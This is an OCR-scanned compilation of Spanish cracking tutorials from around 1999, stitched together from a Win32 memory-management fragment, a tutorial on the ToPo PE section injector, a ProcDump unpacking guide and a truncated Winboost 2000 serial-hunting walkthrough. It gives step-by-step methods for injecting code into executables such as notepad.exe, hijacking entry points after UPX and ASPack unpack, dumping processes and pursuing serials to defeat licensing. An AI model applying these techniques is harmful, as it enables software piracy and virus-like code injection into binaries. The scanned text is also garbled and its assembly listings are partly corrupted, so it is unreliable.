se obtendrá un cuadro de mensaje diciendo: «Este programa ha realizado una operación ilegal y se cerrará». Este bit 
no evita que un programa compile el código fuente del programa y almacene las instrucciones de lenguaje 
ensamblador en memoria para ser ejecutadas. 


Las direcciones virtuales tienen un ancho de 32 bits. El código y los datos (estáticos, de pila o localizados) de un 
programa tendrán direcciones entre 0x00000000 y Ox 7FFFFFFF. El propio W32 usa direcciones desde 0x80000000 
a OXFFFFFFFFE y aquí es donde se encontrarán los puntos de entrada a las librerías de enlace dinámico (DLL) de 
W32. 


La cantidad total de memoria libre está determinada por la cantidad de memoria física libre y el área libre de disco 
duro disponible para intercambio de páginas. Como es normal con la gestión de memoria virtual, W325 emplea un 
algoritmo LRU (Least-Recently Used: usado-menos-reciente 

mente) para determinar qué páginas intercambiar a disco. Los bits de «acceso» y «sucio» le ayudan en esta tarea. 
Las páginas de código no tienen que guardarse en disco porque las páginas de código no son escribíbles, 
simplemente se puede recargar desde el archivo .EXE o la librería de enlace dinámico (DLL). 


A veces, se verá que se accede al disco cuando se mueve el ratón desde el área cliente de un programa al área 
cliente de otro programa. ¿Por qué ocurre esto? Windows tiene que enviar mensajes de movimiento de ratón a la 
segunda aplicación. Si el código del programa para procesar este mensaje no está cargado actualmente en memoria, 
Windows tiene que recargarlo desde el archivo de disco. Si tiene varios programas Windows grandes cargados 
simultáneamente y no tiene mucha memoria, probablemente verá una actividad inusual en el disco duro a medida 
que se mueve de programa a programa, pues Windows está recargando páginas descargadas previamente. 


A veces, los programas individuales se ralentizan (o se detienen completamente) cuando Windows está realizando 
el intercambio (conmutación) de páginas. Las páginas de código se pueden compartir entre aplicaciones. 


Esto es particularmente útil para las librerías de enlace dinámico. Varios programas ejecután-dose a la vez pueden 
usar las mismas funciones Windows 93, sin que sea necesario que el mismo código se cargue en memoria varias 
veces. Sólo es necesario una copia del código. 


Excepto la granularidad de las páginas de 4 KB, la memoria física no se puede fragmentar porque la 
desfragmentación implica únicamente manipular las tablas de página. Sin embargo, la memoria virtual de una 
aplicación se puede fragmentar si una aplicación localiza, relocaliza y libera varios bloques de memoria. El limite 
de 2 MB para el código y los datos de una aplicación normalmente es suficiente para evitar problemas. Es mucho 
más fácil que un programa se quede antes sin memoria física que llegue a encontrar un límite en la memoria virtual. 
Pero puede ocurrir, y si tiene un programa donde este problema es concebible, puede que desee considerar la 
memoria «movible». 


¿EL PROGRAMADOR PUEDE GESTIONAR LA MEMORIA VIRTUAL? 


Sí, por supuesto. Para ello W32 proporciona varias funciones API: 


Esta función se emplea para reservar y comprometer espacio de memoria virtual: 


LPVOID VirtualAlloc (LPVOID IpAddress, DWORD cbsSize, 
DWORD fdwAllocationType, DWORD fdwProtec); 


Para liberar el espacio de memoria comprometido: 


BOOL VirtualFree (LPVOID IpAddress,SWORD cbSize,DWORD fdwFreeType); 


Bueno. Espero que este breve escrito sobre la gestión de memoria virtual en W32 pueda entenderse y sea de 
utilidad. 


Cualquier error u observación, por favor notifíquenme: 
nuMIT_orOiname.com 
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Introducción 


Los esquemas de protección de software pueden dividirse en dos grandes grupos. 
Los que se apoyan en dispositivos de hardware y los que lo hacen exclusivamente en 
el software. 

Los metodos soft pueden a su vez dividirse en aquellos en los que la limitación de la 
versión es condicional (Serial, fecha limite, numero de usos) y en los que es 
incondicional (opciones físicamente eliminadas del codigo) 


Salvo la elegante alternativa de los KeyMakers y los RegPatches, el resto de las 
desprotecciones exige que se realicen CAMBIOS en ficheros binarios, ya sean datos 
o instrucciones de codigo. 


Una regla de oro del crackista (que palabro!) consiste en que la modificación 
binaria propuesta debe PARCHEAR los contenidos existentes SIN AÑADIR un sólo 
byte. 

Bueno... en la inmensa mayoría de los casos esto no resulta un problema puesto que 
lo que se pretende es cambiar es: 


e el valor de un flag 
e una condición de bifurcacion 
e la ocurrencia de un CALL 


No sólo NO es un problema sino que además establece el alcance del RETO: 
"...sólo modificar en el fichero los bytes existentes y además en mínimo número...” 


Sin embargo, hay un "paquete" de situaciones en las que esta restricción se hace un 
tanto insoportable y que podría responder a la siguiente clasificación: 


e Empaquetados/Encriptados: el código NO está accesible en el fichero. 

e Reconstrucción de código no presente. 

e Emuladores de llave de hardware. 

e Adición de NUEVOS elementos a un programa sin tener el código fuente. 


Qué tienen en común estos casos? pues se me ocurren dos cosas: 


e Necesidad de un área "espaciosa" para escribir nuestro código añadido. 
e Necesidad de convivir en el mismo espacio de memoria del programa. 


Puede verse que esto trata de INGENIERÍA INVERSA en el aspecto más amplio y 
no sólo en lo que respecta al cracking. 
Pero cómo se consigue expandir el área de código de un programa en una forma 


segura y estable...? La respuesta tiene nombre de bicho: ToPo v1.0. 


> y 
nl 
ToPo: Arreglando el cuarto de invitados 


ToPo v1.0 es una utilidad que permite añadir a un ejecutable (o DLL) una extensión 
vacía para ser rellenada con código fresco. Podemos añadir típicamente una decena 
de estas "extensiones ortopédicas" dependiendo de la estructura interna del fichero. 
Entonces podremos hexeditar y añadir nuevas rutinas, parchear el código en 
memoria, reconstruir código incompleto, diseñar emuladores de dongle, trainers para 
juegos...y todo ello sin limitación de espacio! (- 10 Mb) 


El principio en que se basa la herramienta es muy simple. La estructura del formato 
PE (ejecutables y librerías Win32) consiste en una colección de cabeceras con 
multitud de datos (muchos no usados para nada). 


Entre las cabeceras más importantes están las llamadas cabeceras de sección. Son 
paquetes de 40 bytes donde se definen las características de los bloques de datos del 
programa (código, constantes, iconos, punteros, etc). 


La zona en que habitan estas cabeceras suele disponer de espacio libre para añadir 


del orden de 10 nuevas y nada impide que un programa tenga mas de una seccion de 
código (como ejemplo sirvan los empaquetadores en los que la rutina de 
desempaquetado suele alojarse en una sección propia). 


Así las cosas podemos DECLARAR una nueva sección del tamaño que nos 
apetezca y AÑADIRLA al final del fichero sin ningún tipo de problemas. El nuevo 
invitado tendrá un "segmento" de direcciones a las que (y desde las cuales) se podrá 
acceder al resto de la imagen del fichero en memoria. 


Reinventando los virus, MrCrimson? bueno cada cual es libre de inocular lo que le 
parezca... personalmente prefiero darle aplicaciones constructivas como el 
CrAcKiNg! 


VW 
ToPo: Bichos en el jardín 
t:* ToPo by MrCrimson¿[W'kT199] E 


Select file... 


je: ATempiMyFile.exe 


[Y Backup file 


Bytes to be added: I 00 FT Redirect Entrypoint 
TT” Make code writable 


Result: — 
100 bytes added at: Doll 


-memory address: D0409000h Help 


+ile offset: 00001400h Exi 
Exit 


Este es el cuadro de diálogo de la herramienta perforadora. El usuario solo tiene que 
seleccionar su fichero víctima (32 bits only, plz) e indicar cuantos bytes necesita 
para escribir su código. El click en "Do It!" informa acerca del éxito del resultado y 
de donde puede localizarse el nuevo inquilino (tanto en memoria como en fichero). 


Las opciones permiten: 


e Backup file: saludable copia de seguridad antes de inyectar el alien. 

e Redirect Entrypoint: Hace que el programa COMIENCE su ejecución en 
la nueva sección (".topo") al final de la cual se vuelve al inicio natural del 
programa. Esto nos permite realizar los cambios que sean necesarios en el 
código mapeado en memoria. 

e Make code writable: Permite que podamos escribir tranquilamente en el 


código principal. Necesario si vamos a parchear. 


Y con esto está todo dicho. Vamos a ver que se puede hacer en la práctica. 


VI 
Ejemplo (1): Adición de código nuevo 


Como víctima utilizaremos un programa del que todos disponemos: el bloc de notas 
(ejecutable: "notepad.exe" alojado en "Wwindows”). 

Vamos a añadir un trozo de código de 100 bytes con una llamada API. Para ello haz 
una copia en otro directorio y arranca ToPo v1.0: 


e selecciona: notepad.exe 
e tamaño a añadir: 100 bytes 


Seleccionar opciones: 


e Backup 
e Redirect entrypoint 


Una vez hecho se nos informa de que la nueva sección estará disponible en el offset 
de fichero x8A00h y si trazamos con Winice lo encontraremos a partir de la 
dirección :40C000. 

La opción "redirect entrypoint" ha cambiado el EntryPoint original :401000 (inicio 
de la sección ".code") por :40C000 (inicio de la sección ".topo"). Además, al final 
del bloque ha insertado un JMP 401000 de forma que despues de nuestros arreglos 
regresamos automaticamente a la ejecución natural del programa. 


Vamos a hacer que el NOTEPAD genere una especie de splash precaria esperando 
confirmación antes de arrancar. Todos conoceis ya la sintaxis de la función 
MessageBox: 


push Estilo 

push Titulo_ventana 

push Mensaje 

push Handle_ventana_Padre 
Call MessageBox 


Como estilo elegimos el más simple: un simple botón "OK" (valor 0) 
Como título pondré: "MrCrimson dice:" 

Como mensaje: "Tomando el control desde el principio" 

Nuestra ventana no tendra padre (sob!) con lo que el handle sera cero. 


Ahora, la forma más fácil de proceder consiste en arrancar Winice y con el comando 
AN 


comenzar a escribir el código en nuestra parcela. Cómo definimos las strings...? muy 
fácilmente: 


-Escribimos todas nuestras constantes y variables a partir del 3er byte. 
-Reservamos los dos(**) primeros bytes para un JMP que salte por encima de estas 
declaraciones. 


(*) el número exacto dependerá del tamaño de los datos). 
Por ejemplo: 


:40C000 ¡mp 40C005 
:40C002 686F6C6100 <---- "hola" (00 terminador de strings) 
:40C005 continua el codigo 


el offset :40C002 contiene la cadena "hola" y podemos usarlo como argumento en 
nuestras llamadas a función. De esta misma forma se definen variables y constantes 
en general (el segmento ".topo" tiene atributos de leible, escribible y ejecutable!). 


No os preocupeis si Winice o W32Dasm interpretan las variables así definidas como 
instrucciones de código inexistentes. Es normal. Intentan desensamblar lo 
inensamblable... 


Después escribimos los pushes, la llamada a MessageBox y dejamos el resto como 
está (una sucesión de NOPs hasta el JMP [original_entrypoint]. Copiamos con buena 
letra el código ensamblado resultante en un papelito y abandonamos Winice no sin 
antes haber borrado lo escrito restaurando los NOPs originales. 


Ahora hexeditamos (Uedit) el notepad.exe, nos vamos al offset donde comienza la 
sección ".topo" y tecleamos el churro de bytes. Cerramos y ejecutamos notepad 
obteniendo la ventana esperando confirmación para iniciar el "Bloc de Notas". 


En este ejemplo, el código añadido tiene este aspecto: 


[FAR ARIK KK KARA KK KAR Program Entry Point KKXXKXXXX* 
:0040C000 EB3B jmp 0040C03D ;--> 
salto hasta 


después de 


definir las 


"strings" 

¿Codigo inexistente... se trata de las strings: 
¿T=54h, o=6Fh, m=6Dh, a=61h, m=6Dh,...."Tomamos el 
Control” 

:0040C002 54 push esp 
:0040C003 6F outsd 


:0040C004 6D insd 


:0040C005 61 popad 


:0040C006 6D insd 

:0040C007 6F outsd 

:0040C008 7320 jnb 0040C02A 
:0040C00A 65 BYTE 065h 

:0040C00B 6€C insb 

:0040C00C 20636F and byte ptr [ebx+6F], 
ah 


; Una vez definidas las variables, comenza el código: 


:0040C03D 6A00 push 00000000 ; estilo 
0 

:0040C03F 682CC04000 push 0040C02C ; 
"MrCrimson says:" 

:0040C044 6802C04000 push 0040C002 ; 
"Tomamos el ctrl..." 

:0040C049 6A0O push 00000000 ; Padre 
0 


* Reference To: USER32.MessageBoxA 


:0040C04B FF1530744000 Call dword ptr 
[00407430] 

:0040C050 90 nop 

:0040C051 90 nop 

:0040C052 90 nop ; hasta 


completar 100 
:0040C05F E99C4FFFFF jmp 00401000 ; notepad 
normal 


La llamada a MessageBox parece un tanto misteriosa (offset :407430) pero los bytes 
que componen la instrucción pueden obtenerse fácilmente ensamblando desde 
Winice la linea: 


call dword ptr[MessageBoxA] 


NOTA: En la primera versión de este tute un descuido me llevo a codificar esta 
llamada mediante: 

[Winice (A)ssemble] call MessageBox 

El resultado era que funcionaba perfectamente en mi ordenador pero no en otros... 
Para que el enlace dinámico con la función en la dll (en este caso user32.dll) proceda 
correctamente, la llamada debe realizarse como se ha indicado. 


Una vez completado ejecutamos notepad y obtendremos una ventana con una mesaje 
chorra esperando un click en el OK para proseguir con el "bloc de notas". 


Este ejemplo ha mostrado como INCRUSTAR un trozo de código de -100 bytes 


donde aparentemente no cabría un alfiler. :0) 


ny 
Vi 
Ejemplo (2): Parcheador de Empaquetados Universal 


Por lo general, los empaquetadores/encriptadores de ficheros operan según una idea 
común. 

El código util está cifrado de manera que desensamblando no se puede analizar su 
comportamiento. En el momento de la ejecución entra en juego una rutina que 
escribe en memoria la versión no-encriptada y a partir de ese momento todo 
transcurre como si de un ejecutable normal se tratara. 

La forma de atacar a estos programas tan poco comunicativos se basa en cargadores 
o loaders. 

Un cargador es un programa capaz de cargar en memoria otros ejecutables y 
detenerse antes de comenzar su ejecución de manera que puede aprovecharse la 
ocasión para realizar los oportunos parcheos. Sin embargo son fáciles de engañar y 
tienen problemas para "seguir la pista" a nuevos threads (al menos los que he podido 
examinar). 


ToPo no tiene este tipo de problemas porque genera un "enemigo interior" que 
puede actuar justo después del desencriptado del código cualquiera que sea el 
algoritmo. Como ejemplo veremos como funciona con un par de empaquetadores de 
élite. 


(a) UPX v0.84 


Intentamos repetir la gracia anterior con una versión de Notepad.exe empaquetada 
con UPX. 
para ello tecleamos en la línea de comandos del DOS: 


C> upx -9 notepad.exe 
y ya está. Pfff....reducido a la mitad de tamaño!. Me encanta este packer :0) 


Ahora debemos añadir nuestra burbuja pero esta vez NO queremos redirección del 
entrypoint ya que este hace referencia al comienzo de la rutina de descompresión y 
no 

al código del notepad. 

Ok, tenemos el Notepad.exe, empaquetado con UPX e inoculado con una sección 
topo de 100 bytes (no necesitamos tantos en realidad...). Trazamos un poco para ver 
como respira el asunto poniendo un BPM en 401000 (el entrypoint original de 
notepad). Dejamos que fluya el código con E5 y... reaparecemos en :40C080. Se está 
escribiendo el código desempaquetado en su ubicación original... es decir que 
estamos en la rutina desempaquetadora. Trazamos un poco hacia el final para 
comprobar que la cosa acaba con un JMP al entrypoint del programa empaquetado 
(:401000). 

Esta rutina está perfectamente accesible por lo que desde UltraEdit modificamos el 
salto al inicio de nuestra sección ".topo" (JMP 40E000). 


A partir de aqui todo se reduce al caso anterior. Disponemos del código 
desempaquetado en memoria ANTES de comenzar la ejecución. Añadimos, como 
antes, nuestras "strings", los pushes y la llamada a messagebox (no copiar 
directamente porque las direcciones relativas no son las mismas). Por ultimo 
cerramos con un JMP al entrypoint de notepad :401000. 


(b) ASPack v1.08.03 


Este packer presenta algunas diferencias con el anterior. La compresión no es tan 
buena pero a cambio establece "potentes" medios de protección del código 
empaquetado. Siguiendo el ejmplo anterior intentaremos ejecutar nuestra lamer- 
splash al comienzo de la ejecución del notepad. 


Con las pautas ya explicadas (BPM a la primera instruccion del notepad, :401000) 
intentamos cazar el final de la rutina de descompresión para saltar desde allí a 
nuestra fortaleza de código en blanco. Y facilmente la encontramos en: 


:40C554 MOV [ESP+1C],EAX 

:40C558 POPAD 

:40C559 JNZ 40C563 

:40C55B MOV EAX, 1 

:40C560 RET 000€ 

:40C561 PUSH EAX 

:40C561 RET <------ Esto nos lleva al comienzo de 
"notepad" 


Cuando abrimos "notepad.exe” con Uedit para buscar este trozo de código 
descubrimos que NO ESTA. Impresionante. La rutina que desencripta esta también 
encriptada. 

No problemo. Buscaremos el código que desempaqueta al desempaquetador 
siguiendo la misma tecnica de los breakpoints en memoria. Así llegamos a: 


:40C0AE REPZ MOVSD 

:40C0B0 MOV ECX,EAX 

:40C0B2 AND ECX, 03 

:40C0B5 REPZ MOVSB <----- Copia el unpacker unpacked! 
:40C0B7 MOV EAX, [EBP+4450B5] 


Este código Sl esta accesible (bueno estaría que no) y perfectamente editable. 
Vamos pues con Uedit y modificamos la instrucción en :40C0b7 según: 


:40C0B7 JMP 40F000 <---salto a la sección ".topo" 


No debemos preocuparnos por las modificaciones que hacemos para acceder al 
".topo" porque antes de regresar restauraremos todo. 


Al comienzo del ".topo" codificamos lo siguiente (ayudandonos de (A)ssembly en 
Winice): 


¡Parcheamos el codigo en :40C554 por "3jmp 40f032" 
¡Es un salto a la mitad de la nueva sección donde 
¿pondremos nuestra messagebox 


:0040F000 mov dword ptr [0040C554], 002AD9E9 
:0040FO0OA mov byte ptr [0040C558], 00 


¡Restauramos el contenido en :40c0b7 a su 
¿código original "mov eax, [ebp+4450b5]" 


:0040F011 mov dword ptr [0040C0B7], 50B5858B 
:0040F01B mov word ptr [0040C0BB], 0044 


¿regresamos a :40c0b7 como si nada hubiera 
¡¿pasado... 


:0040F024 3jmp 0040C0B7 


Perdidos...? Recapitulemos: hemos parcheado con Uedit la rutina que desempaqueta 
al desempaquetador del codigo. El objeto del parche es establecer un acceso a 
"topo" que 

contendrá un nuevo parche en memoria. Este parche modifica el desempaquetador 
final para que salte de nuevo a ".topo" (hacia la mitad de la sección) ANTES de 
lanzar el Notepad. 

Creo que lo realmente lioso es intentar contarlo...hacerlo es muy fácil. 


La segunda mitad de ".topo" contiene el siguiente codigo más familiar: 


:0040F032 60 pushad ¿por 
seguridad 
:0040F033 EB3B jmp 0040F070 ¿saltamos 


las strings 


¿ strings usadas para la ventana messagebox 


:0040F035 54 push esp 

:0040F036 6F outsd 

:0040F037 6D insd 

:0040F069 7061 jo 0040FOCC 

:0040F06B 636B20 arpl dword ptr 
[ebx+20], ebp 

:0040F06E 2000 and byte ptr [eax], al 
:0040F070 6A00 push 00000000 ¡estilo 


0 


:0040F072 685FF04000 push 0040F05F ¡string 
titulo 


:0040F077 6835F04000 push 0040F035 ¿string 
mensaje 
:0040F07C 6A00 push 00000000 


¡Padre/Hwnd 


* Reference To: USER32.MessageBoxA 
:0040F07E FF1530744000 call dword ptr 
[00407430] 


¡¿Restauramos las instrucciones que habia antes del salto 
¡"40C554 mov [esp+1c],eax" 
¡"40C558 popad" 


:0040F084 C70554C540008944241C mov dword ptr 
[0040C554], 1C244489 


:0040F08E C60558C5400061 mov byte ptr 
[0040C558], 61 

:0040F095 61 popad 
:0040F096 E9BAD4FFFF jmp 0040C554 


Y así acaba esta historia. 
De manera muy similar se pueden parchear hasta la saciedad todos los 
packers/crypters. Al menos así ha sido con los que he probado. 


OS 
V 


La técnica ilustrada resuelve dos inconvenientes clásicos del Arte del Cracking. Por 
una parte la tradicional limitación de espacio que nos impide en ocasiones generar 
productos más creativos. Por otro lado se trata de una estrategia "en caliente" puesto 
que trabaja desde dentro del código como una parte más del programa original. 


Conclusión 


Como inconveniente citar el hecho de que cambia el tamaño de fichero y por tanto 
los clasicos parcheadores de diferencias no trabajarian con éxito. 
Un crack basado en esta técnica no sería un parcheador sino más bien un "inyector". 


Eso es todo por el momento. Este tutorial era originalmente más largo pero creo que 
con los ejemplos propuestos queda claro lo que se puede hacer con esta técnica. 
Espero que hayas pasado un buen rato leyendo este ladrillo. 


Los ejemplos de este tute están aquí (47kb): ejemplos.zip 
ToPo v1.0 esta disponible en http://i.am/MrCrimson 


Up The Hammer! 
MrCrimson/[WkT!99] 


Como usar el ProcDump para 
descomprimir/desencriptar tus cobayas 
By Mr. Orange (1999) 


0) Introduccion. 

1) Herramientas necesarias. 
2) Un vistazo al Procdump. 
3) Descompresión manual. 
4) Añadir un Script. 

5) Nota final. 


0) Introduccion. 


La intencion de este manual es enseñar como descomprimir nuestro 
objetivo cuando no hay un descompresor para el (o por lo menos no lo 
tenemos). 

Nuestra cobaya va a ser el CuentaPasos v3.75. 


1) Herramientas Necesarias. 


o SoftICE 
o ProcDump (Yo he usado la versión 1.5 Build 0 > 


2) Un vistazo al Procdump. 


ProcDump es una herramienta que te permite (entre otras cosas) copiar 
el contenido de un proceso al disco duro. También te permite editar la 
cabecera de los programas de tipo PE (Portable Executable). 


Veamos entonces como funciona... 

La ventana principal tiene 2 listas y 7 botones. La primera lista 
contiene los procesos que estas ejecutando en este momento, mientras 
que la segunda contiene los modulos que estan asociados a cada 
proceso. Los botones son: 


Unpack: Descomprime un ejecutable. Procdump es capaz de 
descomprimir algunos compresores. 

Rebuild PE: Reconstruye la cabecera de un ejecutable. 

PE Editor: Esta claro, no? Te permite editar la cabecera de un 
ejecutable. 

Bhrama Server: Ejecuta el Servidor Bhrama. Esto premite 
que otro programa (llamado cliente) se aproveche de las 
magnificas cualidades del ProcDump. 

Options: Para modificar alguna opción del programa. 
About: Muestra información del ProcDump. 

Quit: Salir del programa. 


Para más información, leete los *.TXT que vienen con el ProcDump 


¿Que utilidad tienen las listas? 
En la lista de procesos podemos realizar 3 operaciones que son 
accesibles a traves del botón derecho del ratón: 


Dump (FULL): Copia todo el contenido del proceso al disco 
duro. 

Dump (PATIAL): Copia el contenido del proceso al disco 
duro (solamente un rango). 

Kill Task: Termina un proceso. 

Process Infos: Muestra la cabecera del ejecutable. 

Refresh List: Actualiza la lista. 


Mientras que en la lista de modulos las opciones disponibles son: 


0) 


0) 


Dump (FULL): Copia todo el contenido del modulo al disco 
duro. 
Dump (PATIAL): Copia el contenido del modulo al disco 


duro (solamente un rango). 


3) Descompresión manual. 


OK!! Empecemos por analizer el fichero. Para ello he utilizado la magnifica 
herramienta Gettyp, y los resultados son: 


-= [cpasos32.exe] 
DOS executable file -— 334562 bytes 
Portable executable 


Found no known modifier or compiler. 


Calculated entrypoint: 


0011440Ah) 


Required CPU type: 


8714 / 0000220Ah 


80386 


Requires Win 95 or NT 4 


Flags: 


File is executable 
Line numbers stripped from file 
Local symbols stripped from file 
32 bit word machine 


Linker version: 


Objects 
Name 
.Ttext 
. data 
.idata 
.ISrc 
Oreloc 


.reloc 


4.20 


(object align 


Virt size 
000BD200h 
00017CA4h 
00000400h 
00030C00h 
0000A600h 
0000640Ah 
000000DCh 


= 00001000h): 


RVA 
00001000h 
000BFO00h 
000D7000h 
000D8000h 
00109000h 
00114000h 
0011B000h 


Found 318690 bytes overlay 
Absolute position: 


15872 of 334562 
Found archive at position 898 in overlay 


Phys size 
000BD200h 
00000000h 
00000200h 
00001800h 
0000A600h 
00001E00h 
00000200h 


next detection level 


RKive 1.92 archive 
Don't know how to list this type of archive :-( 


(= 4. 


(starting at 128 for 334434 bytes) 


(RVA: 


Phys Ofs 

00000000h 
00000000h 
00000400h 
00000600h 
00000000h 
00001E00h 
00003C00h 


1%) 


Segun parece, nuestro amigo esta comprimido. Pues tiene un Overlay de 318690 
bytes, y si nos fijamos, el programa entero ocupa 334562 bytes. 


¿Que es lo que sabemos hasta ahora? 

Que nuestro amigo esta comprimido, pero no es posible que se ejecute el codigo en 
ese estado, por lo que se debe descomprimir en memoria y luego ejecutarse. Asi 
pues lo primero que se debe hacer el programa es descomprimir el codigo y luego 
ejecutarlo. 


Sabiendo esto, cargemos a nuestra cobaya en el SoftICE y pongamos un 
breackpoint al principio del codigo: 


0051440A ; Subrout ine 
0051440A public start 
0051440A start proc near 


0051440A ¿mp  005144B5 


005144B5 mov eax, lesptarg_0] 
005144B9 and eax, 0051441B 


005144BF call 00514835 <-— Rutina de descompresion 
005144C4 inc 005144B4 

005144CA mp eax <-- Salto al programa ya 
descomprimido 


005144CA start endp 


Bien, ahora ya sbemos que es lo que hace el programa, pero ¿Como vamos a 
descomprimirlo? 

Pues muy sencillo, vamos a ejecutar el programa paso a paso hasta la linea 
005144CA. Justo ahi vamos a modificar una lineas de codigo, esi que introduce el 
comando a (para ensamblar), y escribe la siguiente linea: ¡mp eip 

Esto provocara que el programa quede en un bucle infinito en la linea 005144CA. 
Ahora es cuando debemos de ir al ProcDump y pulsar con el boton derecho sobre 
nuestra cobaya y elegir la opción Dump (FULL), y lo guardamos con el nombre 
que queramos. 

Bien, ahora ya tenemos el CuentaPasos descomprimido. Veamoslo, ejecutemoslo y 
BOOOMMM!!!! El programa no funciona, ¿porque? La respuesta es bien sencilla. 
Nosotros tenemos el programa descomprimido, pero el punto de entrada todavia es 
el de la rutina de descompresión. Debemos de combiarlo para que apunte al 
principio del codigo ya descomprimido. 

Bien, pero ¿como sabemos cual debe ser el nuevo punto de entrada? La respuesta la 
tenemos en la linea 005144CA, ahi hay un JMP EAX. Por lo que en EAX tenemos 
lo que buscamos. Nos apuntamos el valor de EAX (en mi caso 00401228) y 
volemos al ProcDump. 


En esta Ocasión, vamos a utilizar la opcion PE Editor, con la que podemos editar 
la cabecera del ejecutable (alli entre otras cosas esta el punto de entrada), y 
seleccionamos el archivo que hemos creado. Nos aparecera una ventana como esta: 


PE Structure Editor | 


— Header nfos e Structures. Editar 


Entry Poit : [00114404 Sections | Directory | 


Size of image : fo01 32000 apply changes method: 
í* Only to PE header 


Image Base: [00400000 || TOPEfe Cancel | 


Debemos de fijarnos en los cuadros de texto de Image Base (IB) y Entry Point 
(EP). El programa empieza a ejecutarse en IB+EP, por lo que sabiendo esto nos 
resultara fácil modificar la cabecera para que apunte a 00401228. Tan solo debemos 
poner en Entry Point 00401228 - Image Base = 00001228. Asi que pongamos 
00001228 en Entry Point y pulsemos OK. Prueba a ejecutar ahora el programa!! 
Bien, Funciona. Ahora ya tenemos el CuentaPasos descomprimido. xDD 


4) Añadir un Script. 


Vamos a añadir un Script al ProcDump para que sea capaz de 
descomprimir el CuentaPasos, asi que editemos el fichero script.ini del 
ProcDump para añadir una nueva entrada: 


P1A=PCGUARD v2.10 

P1B=Aspack108.3 

P1C=Shrinker 3.4 

P1D=CuentaPasos v3.75 <-- Entrada añadida 


[CuentaPasos v3.75] 
L1=LOOK FF,EO0 
L2=BP 

L3=STEP 


Realmente es bastante sencillo lo que hace este Script: La primera 
linea busca la secuencia de bytes FFEO que corresponden a los 


opcodes de JMP EAX, luego ponemos un BreackPoint y ejecutamos el 
progama paso a paso para gaurdarlo al disco duro. 

Sencillo, no? ¿Que conseguimos con esto? Pues es probable que en la 
proxima versión el autor utilice el mismo compresor, y nosotros tan 
solo tendremos que ejecutar el script para descomprimirlo. xDD 


5) Nota final. 


Bueno, esto es todo por hoy. Pero no queria terminar este articulo sin 
deciros que este metodo de compresion es realente muy sencillo (Si lo 
intentamos descomprimir con el metodo estandar que viene con el 
ProcDump, tambien tendremos exito :)) ). Pero mi intención era 
enseñar como hacer esto mismo manualmente y luego añadir un 
pequeño Script al ProcDump para ser capaces de descomprimir otros 
programas que emplean el mismo compresor. 


PD: Recordad que muchos compresores utilizan trucos antidebug y 
tambien es posible encontrarse otros que incluyan codigo 
antiSoftICE... :)) 

Como quitar la protección VBOX que tiene el Ulead Button.Applet 1.0 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Winboost 2000 v1.0.0.1999 | W9S / W98 / NT 


Winboost 2000 es un interesante programa que te permitirá personalizar tu windows. 

Entre sus multiples opciones destacan los trucos tipicos y cantidad de chorradas varias 
Descripción pero muy útiles. Por ejemplo hacerte un acceso directo en el escritorio para apagar el 

pe con un doble click. 

Y todo esto en un plis-plas. 


MA Mae ia 

Url a 
A 
[| Dificultad [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| Herramientas [Gettyp v2.38, ProcDump v1.5, W32dasm v8.93, UltraEdit v6.10a. 
| Objetivo [Obtención de un número de Serie Válido. 
NN 


Introducción 


Vamos a ver la protección que utiliza, ya que es realmente lo que más me interesa de 
este programa. Newbies: Seguimos avanzando :0) 

Mr.WhiTe ha vuelto con otro interesante tutorial bajo el brazo. 

En esta ocasión vamos a aprender unas cuantas cosillas: 


1. Cómo saber si un programa esta comprimido 

2. Uso del ProcDump 

3. Cómo eliminar una "protección anti-desensamblado" 
4. Y por supuesto, cómo cazar un bonito serial 


Por último pero no menos importante aprenderemos lo que no se debe hacer 
NUNCA al programar algo que pretendemos vender: Dejar las puertas 
abiertas. 


Primer susto 


Al abrir el programa nos aparece una ventana con el tipico mensaje: "This is an 
unlicensed copy.....etc", un botoncito con una cuenta atras y la leche. Que peligro. 
Ummm, hay una opción para introducir un Serial. Veamos si es más de lo mismo. 
:0( 

Ponemos un nombre y un fake serial, le damos al botoncito..... y NADA, no hay 
mensaje de error. Tsche!! ¿de que vas bitter-kas? , esto ya es algo mas interesante. 
(No te creas todo lo que te dice la gente, ya veras) 


Bueno, seguimos a ver por donde podemos atacar. Lo primero es lo primero: 
Desensamblamos el archivo WB2000.exe usando el W32dasm con la intención de 


echar un primer vistazo. aaaaaaaaahhhhhhhhh!!!! ¡Que miedo! No vemos nadaaaa 
mi 


uy uy, esto tiene muy mala pinta. Probamos esa dll sospechosa a ver.....(wb2000.dll) 
.... tsche!! nada!! tampoco hay nada visible. 


E. 
Vi 


Abrelatas! 


Esta joya tiene toda la pinta de estar comprimida. Como no tenemos ni idea de que compresor han 
utilizado para hacer un poco de magia, vamos a echar mano de un útil programita. Se trata del Gettyp. 
Este programa, disponible en http://w3.to/protools/ nos proporcionara toda la información necesaria 
para descomprimir correctamente el archivo. Vaya, parece ser que se trata del "ASPACK 1.083" 


¿GetTyp User Interface 1.06 - D:icrackingigettypforwm1... 


Filename: [F Awinboost2000_1.0.144B2000.exe 


- [F:1WINBOOST2000_1.0.111WB2000.exe] ----- 
DOS executable file - 681984 bytes 


Portable executable (starting at 256 for 681722 
Packer: ASpack 1.083 
Calculated entrypoint% 675328  O00A4E00Oh  ( 
Required CPU type: 80386 
Requires any version of MNin3Z 
Flags: 
File is executable 
Line mumbers stripped from file 
Local symbols stripped from file 


About... | ll Dptions... | Close | 


Estupendo, parece que ahora ya podemos echar mano del ProcDump para descomprimir el .exe y 
poder desensamblarlo. A ver si hay suerte hombre. :0) 

Abrimos el Procdump y seleccionamos Unpack, seleccionamos el compresor aspack 1.083 y le 
indicamos la ruta hasta nuestro WB2000.exe. Una vez cargado el Winboost, volvemos a la ventana del 
Procdump y si todo ha salido bien veremos una ventanita como esta: 


há 


ProcDump Request 


AN Please hit OK when task is loaded [check TaskBar] 


Pulsamos el boton y esperamos, esperamos..... esperamos....ahh, por fin nos sale una opcion para 
guardar el archivo descomprimido. Umm vamos a llamarlo WB2000ecd.exe mismamente. :0) Process 
succesfully unpacked!!! Estupendo. Vamos a probar ese WB2000ecd.exe a ver si funciona bien. Como 
la seda, pero sigue estando "unregistered” :0) jejeje. 


Ok, desensamblamos la octava maravilla y vamos a ver esas "String References”. Aaaaaaaaarggg2822 
!!! pero que pasa aqui??? 


Calma calamar. :0) 
Lo que sucede es que el programa tiene una protección anti Dasm que te acaba de acojonar. Newbie, 
tranquilo, toma un poco de aire y al ataque: 


